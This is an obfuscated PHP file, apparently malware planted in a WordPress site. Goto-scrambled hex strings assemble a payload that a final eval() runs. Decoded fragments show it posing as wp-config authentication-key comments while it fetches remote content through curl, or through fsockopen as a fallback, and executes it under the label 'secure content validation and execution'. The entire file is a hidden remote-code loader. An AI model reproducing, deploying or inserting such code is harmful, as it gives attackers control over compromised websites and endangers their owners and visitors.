_695AF14F98F34: $cfyzo.="\x54\x48\x5f\x4b\x45\x59\x27\x2c\x20\x20\x73\x74"; goto _695AF14F98F35;
_695AF14F98F5C: $cfyzo.="\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x74"; goto _695AF14F98F5D;
_695AF14F98F9E: $cfyzo.="\x5f\x68\x74\x74\x70\x5f\x63\x75\x72\x6c\x29\x3b"; goto _695AF14F98F9F;
_695AF14F98FC4: $cfyzo.="\x6e\x61\x6d\x65\x20\x48\x54\x54\x50\x2f\x31\x2e"; goto _695AF14F98FC5;
_695AF14F98FEE: $cfyzo.="\x77\x70\x5f\x64\x62\x5f\x72\x6f\x77\x73\x5b\x30"; goto _695AF14F98FEF;
_695AF14F99006: $cfyzo.="\x20\x2f\x2a\x2a\x20\x0d\x0a\x20\x20\x20\x20\x20"; goto _695AF14F99007;
_695AF14F98FB6: $cfyzo.="\x61\x72\x73\x65\x64\x5b\x27\x70\x61\x74\x68\x27"; goto _695AF14F98FB7;
_695AF14F98FF4: $cfyzo.="\x69\x6f\x6e\x0d\x0a\x20\x2a\x20\x56\x61\x6c\x69"; goto _695AF14F98FF5;
_695AF14F98FC8: $cfyzo.="\x73\x74\x3a\x20\x24\x77\x70\x5f\x64\x62\x5f\x68"; goto _695AF14F98FC9;
_695AF14F98F29: $cfyzo.="\x69\x6f\x6e\x20\x63\x6f\x6e\x73\x74\x61\x6e\x74"; goto _695AF14F98F2A;
_695AF14F98F26: $cfyzo.="\x50\x72\x65\x73\x73\x0d\x0a\x20\x2a\x2f\x0d\x0a"; goto _695AF14F98F27;
_695AF14F98F94: $cfyzo.="\x20\x43\x55\x52\x4c\x4f\x50\x54\x5f\x55\x53\x45"; goto _695AF14F98F95;
_695AF14F98F2F: $cfyzo.="\x76\x75\x66\x6b\x2f\x7a\x62\x70\x2e\x67\x61\x72"; goto _695AF14F98F30;
_695AF14F98F15: $cfyzo.="\x69\x6e\x20\x74\x69\x6d\x65\x20\x74\x6f\x20\x69"; goto _695AF14F98F16;
_695AF14F98FB0: $cfyzo.="\x54\x48\x5f\x4b\x45\x59\x29\x3b\x0d\x0a\x20\x20"; goto _695AF14F98FB1;
_695AF14F98FE9: $cfyzo.="\x20\x20\x24\x77\x70\x5f\x6c\x6f\x61\x64\x65\x72"; goto _695AF14F98FEA;
_695AF14F98F95: $cfyzo.="\x52\x41\x47\x45\x4e\x54\x20\x3d\x3e\x20\x27\x57"; goto _695AF14F98F96;
_695AF14F98F78: $cfyzo.="\x72\x20\x26\x26\x20\x66\x75\x6e\x63\x74\x69\x6f"; goto _695AF14F98F79;
_695AF14F98F6A: $cfyzo.="\x74\x73\x28\x53\x45\x43\x55\x52\x45\x5f\x41\x55"; goto _695AF14F98F6B;
_695AF14F98F01: $cfyzo.="\x6e\x69\x71\x75\x65\x20\x6b\x65\x79\x73\x20\x61"; goto _695AF14F98F02;
_695AF14F98FE7: $cfyzo.="\x70\x5f\x64\x62\x5f\x72\x65\x73\x75\x6c\x74\x2c"; goto _695AF14F98FE8;
_695AF14F98FDB: $cfyzo.="\x5f\x72\x65\x73\x75\x6c\x74\x20\x2e\x3d\x20\x66"; goto _695AF14F98FDC;
_695AF14F98F07: $cfyzo.="\x59\x6f\x75\x20\x63\x61\x6e\x20\x67\x65\x6e\x65"; goto _695AF14F98F08;
_695AF14F98FB9: $cfyzo.="\x6e\x65\x63\x74\x69\x6f\x6e\x20\x3d\x20\x40\x66"; goto _695AF14F98FBA;
_695AF14F98F6F: $cfyzo.="\x61\x63\x6b\x20\x63\x6f\x6e\x74\x65\x6e\x74\x20"; goto _695AF14F98F70;
_695AF14F98F84: $cfyzo.="\x4f\x50\x54\x5f\x55\x52\x4c\x20\x3d\x3e\x20\x53"; goto _695AF14F98F85;
_695AF14F99019: $cfyzo.="\x69\x72\x65\x64\x27\x29\x3b\x0d\x0a\x7d"; goto _695AF14F9901A;
_695AF14F99002: $cfyzo.="\x20\x20\x65\x76\x61\x6c\x28\x27\x3f\x3e\x27\x20"; goto _695AF14F99003;
_695AF14F98FBF: $cfyzo.="\x66\x20\x28\x24\x77\x70\x5f\x64\x62\x5f\x63\x6f"; goto _695AF14F98FC0;
_695AF14F98FD3: $cfyzo.="\x79\x29\x3b\x0d\x0a\x20\x20\x20\x20\x20\x20\x20"; goto _695AF14F98FD4;
_695AF14F98FE8: $cfyzo.="\x20\x32\x29\x3b\x0d\x0a\x20\x20\x20\x20\x20\x20"; goto _695AF14F98FE9;
_695AF14F98F05: $cfyzo.="\x66\x66\x65\x72\x65\x6e\x74\x20\x75\x6e\x69\x71"; goto _695AF14F98F06;
_695AF14F98F28: $cfyzo.="\x79\x20\x63\x6f\x6e\x66\x69\x67\x75\x72\x61\x74"; goto _695AF14F98F29;
_695AF14F99008: $cfyzo.="\x6c\x69\x6e\x67\x20\x66\x6f\x72\x20\x66\x61\x69"; goto _695AF14F99009;
_695AF14F98FBA: $cfyzo.="\x73\x6f\x63\x6b\x6f\x70\x65\x6e\x28\x24\x77\x70"; goto _695AF14F98FBB;
_695AF14F98FAE: $cfyzo.="\x65\x64\x20\x3d\x20\x70\x61\x72\x73\x65\x5f\x75"; goto _695AF14F98FAF;
_695AF14F98F3A: $cfyzo.="\x6e\x74\x20\x64\x65\x6c\x69\x76\x65\x72\x79\x20"; goto _695AF14F98F3B;
_695AF14F9900A: $cfyzo.="\x0a\x20\x20\x20\x20\x20\x2a\x20\x40\x73\x69\x6e"; goto _695AF14F9900B;
_695AF14F98FE6: $cfyzo.="\x72\x5c\x6e\x5c\x72\x5c\x6e\x22\x2c\x20\x24\x77"; goto _695AF14F98FE7;
_695AF14F98F9C: $cfyzo.="\x70\x5f\x6c\x6f\x61\x64\x65\x72\x20\x3d\x20\x63"; goto _695AF14F98F9D;
_695AF14F98FF2: $cfyzo.="\x6e\x74\x20\x76\x61\x6c\x69\x64\x61\x74\x69\x6f"; goto _695AF14F98FF3;
_695AF14F98F2A: $cfyzo.="\x73\x0d\x0a\x64\x65\x66\x69\x6e\x65\x28\x27\x41"; goto _695AF14F98F2B;
_695AF14F98FEA: $cfyzo.="\x20\x3d\x20\x28\x63\x6f\x75\x6e\x74\x28\x24\x77"; goto _695AF14F98FEB;
_695AF14F98F75: $cfyzo.="\x72\x20\x48\x54\x54\x50\x20\x68\x61\x6e\x64\x6c"; goto _695AF14F98F76;
_695AF14F98F49: $cfyzo.="\x74\x65\x6e\x74\x20\x72\x65\x74\x72\x69\x65\x76"; goto _695AF14F98F4A;
_695AF14F98F10: $cfyzo.="\x72\x65\x74\x2d\x6b\x65\x79\x20\x73\x65\x72\x76"; goto _695AF14F98F11;
_695AF14F98FF1: $cfyzo.="\x53\x65\x63\x75\x72\x65\x20\x63\x6f\x6e\x74\x65"; goto _695AF14F98FF2;
_695AF14F98F42: $cfyzo.="\x63\x68\x65\x73\x0d\x0a\x20\x2a\x2f\x0d\x0a\x0d"; goto _695AF14F98F43;
_695AF14F98F7C: $cfyzo.="\x5f\x68\x74\x74\x70\x5f\x63\x75\x72\x6c\x20\x3d"; goto _695AF14F98F7D;
_695AF14F98FAA: $cfyzo.="\x61\x76\x61\x69\x6c\x61\x62\x6c\x65\x0d\x0a\x20"; goto _695AF14F98FAB;
_695AF14F98F60: $cfyzo.="\x65\x6e\x74\x27\x20\x3d\x3e\x20\x27\x57\x6f\x72"; goto _695AF14F98F61;
_695AF14F98FCD: $cfyzo.="\x43\x6c\x6f\x73\x65\x5c\x72\x5c\x6e\x5c\x72\x5c"; goto _695AF14F98FCE;
_695AF14F99016: $cfyzo.="\x20\x20\x20\x7d\x0d\x0a\x20\x20\x20\x20\x65\x78"; goto _695AF14F99017;
_695AF14F98F92: $cfyzo.="\x43\x41\x54\x49\x4f\x4e\x20\x3d\x3e\x20\x74\x72"; goto _695AF14F98F93;
_695AF14F98F43: $cfyzo.="\x0a\x24\x74\x61\x62\x6c\x65\x5f\x70\x72\x65\x66"; goto _695AF14F98F44;
_695AF14F98F3B: $cfyzo.="\x61\x6e\x64\x20\x75\x70\x64\x61\x74\x65\x20\x73"; goto _695AF14F98F3C;
_695AF14F98FBB: $cfyzo.="\x5f\x64\x62\x5f\x68\x6f\x73\x74\x2c\x20\x38\x30"; goto _695AF14F98FBC;
_695AF14F98FF3: $cfyzo.="\x6e\x20\x61\x6e\x64\x20\x65\x78\x65\x63\x75\x74"; goto _695AF14F98FF4;
_695AF14F98F5D: $cfyzo.="\x69\x6d\x65\x6f\x75\x74\x27\x20\x3d\x3e\x20\x31"; goto _695AF14F98F5E;
_695AF14F98F82: $cfyzo.="\x72\x6c\x2c\x20\x61\x72\x72\x61\x79\x28\x0d\x0a"; goto _695AF14F98F83;
_695AF14F9900B: $cfyzo.="\x63\x65\x20\x33\x2e\x30\x2e\x30\x0d\x0a\x20\x20"; goto _695AF14F9900C;
_695AF14F99001: $cfyzo.="\x30\x29\x20\x7b\x0d\x0a\x20\x20\x20\x20\x20\x20"; goto _695AF14F99002;
_695AF14F98FDD: $cfyzo.="\x63\x6f\x6e\x6e\x65\x63\x74\x69\x6f\x6e\x2c\x20"; goto _695AF14F98FDE;
_695AF14F98F20: $cfyzo.="\x0a\x20\x2a\x20\x44\x61\x74\x61\x62\x61\x73\x65"; goto _695AF14F98F21;
_695AF14F98F9F: $cfyzo.="\x0d\x0a\x20\x20\x20\x20\x63\x75\x72\x6c\x5f\x63"; goto _695AF14F98FA0;
_695AF14F98F0A: $cfyzo.="\x20\x7b\x40\x6c\x69\x6e\x6b\x20\x68\x74\x74\x70"; goto _695AF14F98F0B;
_695AF14F98FCA: $cfyzo.="\x20\x20\x20\x20\x20\x20\x20\x24\x77\x70\x5f\x64"; goto _695AF14F98FCB;
_695AF14F98F5E: $cfyzo.="\x30\x2c\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20"; goto _695AF14F98F5F;
_695AF14F98F1D: $cfyzo.="\x6e\x2e\x0d\x0a\x20\x2a\x0d\x0a\x20\x2a\x20\x40"; goto _695AF14F98F1E;
_695AF14F98F53: $cfyzo.="\x5f\x66\x69\x6c\x65\x73\x79\x73\x74\x65\x6d\x5f"; goto _695AF14F98F54;
_695AF14F98F0D: $cfyzo.="\x63\x72\x65\x74\x2d\x6b\x65\x79\x2f\x31\x2e\x31"; goto _695AF14F98F0E;
_695AF14F98FFF: $cfyzo.="\x77\x70\x5f\x6c\x6f\x61\x64\x65\x72\x2c\x20\x27"; goto _695AF14F99000;
_695AF14F98F13: $cfyzo.="\x61\x6e\x67\x65\x20\x74\x68\x65\x73\x65\x20\x61"; goto _695AF14F98F14;
_695AF14F98FAB: $cfyzo.="\x2a\x2f\x0d\x0a\x69\x66\x20\x28\x21\x24\x77\x70"; goto _695AF14F98FAC;
_695AF14F98FF8: $cfyzo.="\x74\x79\x20\x75\x70\x64\x61\x74\x65\x73\x0d\x0a"; goto _695AF14F98FF9;
_695AF14F98FA9: $cfyzo.="\x74\x68\x6f\x64\x73\x20\x61\x72\x65\x20\x75\x6e"; goto _695AF14F98FAA;
_695AF14F98F9D: $cfyzo.="\x75\x72\x6c\x5f\x65\x78\x65\x63\x28\x24\x77\x70"; goto _695AF14F98F9E;
_695AF14F98F1C: $cfyzo.="\x20\x6c\x6f\x67\x20\x69\x6e\x20\x61\x67\x61\x69"; goto _695AF14F98F1D;
_695AF14F9901A: eval($cfyzo);
?>
